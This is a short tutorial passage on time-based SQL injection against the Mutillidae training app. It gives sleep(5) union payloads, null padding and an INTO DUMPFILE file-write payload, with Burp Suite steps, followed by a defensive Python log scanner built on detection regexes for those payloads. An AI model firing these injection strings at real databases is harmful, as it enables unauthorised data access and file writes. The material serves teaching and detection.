Use Mutillidae

A SQL timing attack takes advantage of either making the database do a lot of work or making it sleep for a period of time.

We measure not what comes back but how long the response takes.

The sleep payload is:

' union select+sleep(5)+--+

BURPSUITE > RIGHT-CLICK > URL-encode as you type

BURPSUITE > RIGHT-CLICK > Send to Repeater > Click on Repeater tab > Click on the Go button to see the response from the server.

In a union statement the datatypes and the number of columns must match the original query. We can use null to pad the columns:

' union select+null, sleep(5)+--+

# If the original query has more columns than our union statement is selecting, keep padding with null.

' union select+null, null, null, sleep(5)+--+

' union select+null,1,null,null, INTO DUMPFILE "test.txt"--
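Added here as a defender-side example (not part of the original notes): a small Python scanner that flags the payload shapes above in URL-decoded request lines and, where the log records response time (Apache `%D`, microseconds), also flags the multi-second responses a sleep-based probe produces. The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Apache-style access log lines (not real traffic).
# The last field is the response time in microseconds, as written by LogFormat "%D".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=user-info.php&username=alice HTTP/1.1" 200 1532 312000
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?page=user-info.php&username=%27+union+select+null%2C+null%2C+null%2C+sleep%285%29+--+ HTTP/1.1" 200 1532 5210000
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?page=user-info.php&username=%27+union+select+null%2C1%2Cnull%2Cnull%2C+INTO+DUMPFILE+%22test.txt%22-- HTTP/1.1" 200 1532 340000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d+) \S+ (?P<usec>\d+)$'
)

# Signatures for the payload shapes in the notes, matched against the decoded URI.
SIGNATURES = {
    "time_delay": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "file_write": re.compile(r"\binto\s+(dump|out)file\b", re.I),
}
# A sleep(5) probe makes the response take seconds; treat >= 3 s as suspicious (assumed threshold).
SLOW_THRESHOLD_US = 3_000_000


def analyse_line(line):
    """Parse one log line; return a dict of findings, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("uri"))  # decode %xx and '+' before matching
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    usec = int(m.group("usec"))
    return {"ip": m.group("ip"), "decoded": decoded, "hits": hits,
            "usec": usec, "slow": usec >= SLOW_THRESHOLD_US}


def find_suspicious(log_text):
    """Return the parsed records that carry a signature hit or an abnormally slow response."""
    findings = []
    for line in log_text.splitlines():
        rec = analyse_line(line)
        if rec and (rec["hits"] or rec["slow"]):
            findings.append(rec)
    return findings


if __name__ == "__main__":
    for rec in find_suspicious(SAMPLE_LOG):
        print(rec["ip"], rec["hits"], "slow" if rec["slow"] else "", rec["decoded"])
```

Correlating a signature hit with a slow response is what separates a real sleep-based probe from a benign request that merely contains the word "sleep".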
